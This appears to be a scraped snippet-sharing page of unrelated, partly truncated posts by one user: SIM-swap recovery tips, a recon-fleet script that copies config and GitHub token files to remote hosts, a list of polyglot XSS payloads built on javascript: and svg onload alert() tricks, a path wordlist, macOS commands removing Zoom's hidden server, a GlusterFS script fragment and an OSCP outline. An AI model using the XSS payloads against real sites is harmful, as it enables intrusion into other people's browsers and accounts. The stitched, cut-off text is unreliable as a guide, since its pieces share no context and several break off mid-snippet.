wellr00t3d

Here's how this attack works: https://www.google.com/amp/s/www.zdnet.com/google-amp/article/how-i-survived-a-sim-swap-attack-and-how-my-carrier-failed-me/

Immediate actions

• Make sure your primary email address has a secure recovery method and remove your old phone number from it.
  • Gmail lets you set "Backup codes" that you can print off to recover your account.
  • Change your email password and put it in a password manager.
  • Remove any link to the old phone number from your email.
• If you're already locked out of your email, set up a "clean" email account. At this point, your old one is being accessed by hackers and can be used to reset any banking passwords.
• Store this new email password in a password manager.

wellr00t3d

#!/bin/bash

# Use this as initial axiom's script on reconftw.cfg file to copy config files to the fleet

axiom-exec 'mkdir -p /home/op/.config/amass/ /home/op/Tools/ /home/op/.config/subfinder/ /home/op/.config/notify/'
axiom-scp ~/.config/amass/config.ini '*':/home/op/.config/amass/config.ini
axiom-scp ~/Tools/h8mail_config.ini '*':/home/op/Tools/h8mail_config.ini
axiom-scp ~/Tools/.github_tokens '*':/home/op/Tools/.github_tokens
axiom-scp ~/.config/notify/notify.conf '*':/home/op/.config/notify/notify.conf
axiom-scp ~/Tools/.github_tokens '*':/home/op/Tools/.github_tokens

wellr00t3d

jaVasCript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//> 
javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//>
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>` 
javascript:`/*\"/*--><svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">`
javascript:"/*'//`//\"//</template/</title/</textarea/</style/</noscript/</noembed/</script/--><script>/<i<frame */ onload=alert()//</script>
javascript:"/*`/*\"/*'/*</stYle/</titLe/</teXtarEa/</nOscript><

wellr00t3d

.
..
........
@
*
*.*
*.*.*
🐎

wellr00t3d

# coding=utf-8
# python3

from urllib.parse import urlparse

import requests
import urllib3

from bs4 import BeautifulSoup

wellr00t3d

If you're using macOS, run these commands:

pkill "ZoomOpener"; rm -rf ~/.zoomus; touch ~/.zoomus && chmod 000 ~/.zoomus;
pkill "RingCentralOpener"; rm -rf ~/.ringcentralopener; touch ~/.ringcentralopener && chmod 000 ~/.ringcentralopener;

These two commands do the same thing for the two most popular "brands" of Zoom (Zoom, and RingCentral). They first kill the hidden server if it is running, and then regardless deletes it from its hidden directory if it exists there. Finally they create an empty file

wellr00t3d

#!/bin/bash
 
if [[ "$#" < "2" || "$#" > "3" ]]; then
  cat <<END
Glusterfs GFID resolver -- turns a GFID into a real file path
 
Usage: $0 <brick-path> <gfid> [-q]

  <brick-path> : the path to your glusterfs brick (required)
  

wellr00t3d

How to pass the OSCP

1. Recon
2. Find vuln
3. Exploit
4. Document it

Recon

Unicornscans in cli, nmap in msfconsole to help store loot in database.